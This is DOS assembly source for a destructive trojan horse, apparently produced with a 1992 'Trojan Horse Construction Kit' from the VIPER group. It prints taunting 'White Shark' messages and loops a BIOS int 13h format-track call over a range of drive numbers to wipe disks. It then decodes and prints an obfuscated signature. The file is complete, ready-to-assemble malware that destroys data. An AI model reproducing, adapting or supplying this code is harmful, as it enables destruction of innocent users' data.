; Trojan Horse Constructed with... ; The Trojan Horse Construction Kit, v1.00 ; Copyright(c) 1992, Stingray/VIPER ; A Viral Inclined Programming Experts Ring Programming Team Production. IDEAL DOSSEG MODEL small STACK 256 DATASEG msg_1 db "",13,10 db "This is a Trojain horse. Curtocy of White Shark! HA HA HA",13,10 db "",13,10 db "Mess with White Shark and you'll be eaten alive!",13,10 db "",13,10 db "",13,10 db "",13,10 db "",13,10 db "",13,10 db "",13,10 db '$' msg_2 db "",13,10 db "You've been fucked! Curtocy of White Shark!",13,10 db "",13,10 db "Mess with White Shark and you'll be eaten alive!",13,10 db "",13,10 db "",13,10 db "",13,10 db "",13,10 db "",13,10 db "",13,10 db '$' vip db "}Ǿ}Ծ}¾}ŋ",106,103 db "}Ǿ}}}щ}ӎ",106,103 db "}}}Ͼ}}Ͼ}}ċ",106,103 CODESEG Start: mov ax,@data mov ds,ax mov ah,9 mov dx,offset msg_1 int 21h mov dl,24 aqui: call fry call fry call fry inc dl cmp dl,1 jne aqui mov ah,9 mov dx,offset msg_2 int 21h mov si,offset vip call DeCrypt_Print jmp Exit PROC DeCrypt_Print push ax push dx here: lodsb or al,al je no_mas xchg dl,al sub dl,93 mov ah,2 int 21h jmp short here no_mas: pop ax pop dx ret ENDP DeCrypt_Print PROC fry push dx mov ax,ds mov es,ax mov ax,0701h mov ch,0 int 13h pop dx ret ENDP fry Exit: mov ax,4c00h int 21h END Start